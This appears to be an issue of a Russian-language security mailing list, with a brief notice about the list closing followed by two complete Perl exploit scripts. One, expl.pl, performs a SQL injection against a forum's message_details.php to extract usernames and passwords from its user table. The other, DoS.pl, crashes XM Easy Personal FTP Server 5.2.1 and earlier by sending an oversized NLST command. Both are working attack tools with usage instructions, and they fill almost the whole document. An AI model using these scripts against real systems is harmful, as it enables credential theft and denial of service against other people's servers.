При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
expl.pl: #!perl use IO::Socket; #Download:http://www.thewebdrivers.com/forum.zip #By:Bl0od3r #Germany =] if (@ARGV<3) { &header; } else { &get(); } sub get() { $host=$ARGV[0]; $path=$ARGV[1]; $id=$ARGV[2]; $socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80) or die ("[-]Error\n"); print "[~]Connecting!\n"; print "[~]Getting Data!\n"; print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n"; print $socket "Host: $host\n"; print $socket "Accept: */*\n"; print $socket "Connection: close\n\n"; while ($ans=<$socket>) { $ans=~ m/<span class="style3"> Re : -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:"; $ans=~ m/<td class=\"text\">(.*?)<\/td>/ && print "$1\n"; if ($1) { $success=1; } else { $success=0;}; } if ($success=="1") { print "\n[+]Successed!"; } else { print "[-]Error"; } } sub header() { print "--------------------------------------------------------------------\n"; print "|\t---------->By Bl0od3r<---------\t\t\t\t |"; print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t |"; print "\n--------------------------------------------------------------------\n"; exit; }
DoS.pl: #!/usr/bin/perl # # * # * Title: XM Easy Personal FTP Server <= 5.2.1 'NLST -al' Remote Denial of Service # * Author: boecke # * Discovery: boecke # * Vulnerability Type: Remote Denial of Service # * Risk: Low Risk (Requires valid # * Software Affected: XM Easy Personal FTP Server <= 5.2.1 # * Greetings: henrik, str0ke! # * # use IO::Socket; $commandToSend = "NLST -al "; $remoteUsername = "anonymous"; $remotePassword = "borat\@kik.com"; $remotePort = $ARGV[1]; sub bannerExploit() { print "\n x XM Easy Personal FTP Server <= v5.2.1 Remote Denial of Service\n"; print " x Author: boecke\n x Discovery: boecke (boecke [at] herzeleid [dot] net)\n\n"; } if ( @ARGV < 2 ) { bannerExploit(); print " * Usage: perl ftp.pl 192.168.0.1 21\n\n"; exit; } if ($socket = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => $remotePort, Proto => "TCP" )) { bannerExploit(); print " + Establishing connection at " . $ARGV[0] . ":" . $remotePort . "\n"; print $socket "USER " . $remoteUsername . "\r\n"; print " * FTP Username: \'" . $remoteUsername . "\'\n"; sleep( 1 ); print $socket "PASS " . $remotePassword . "\r\n"; print " * FTP Password: \'" . $remotePassword . "\'\n"; print $socket $commandToSend . "A" x 9000 . "\r\n"; sleep( 3 ); print $socket "QUIT\r\n"; print " + Sent 9000 bytes of data to $ARGV[0]:$remotePort\n\n"; } else { bannerExploit(); print " + Failed to establish connection to " . $ARGV[0] . ":" . $remotePort . "\n"; }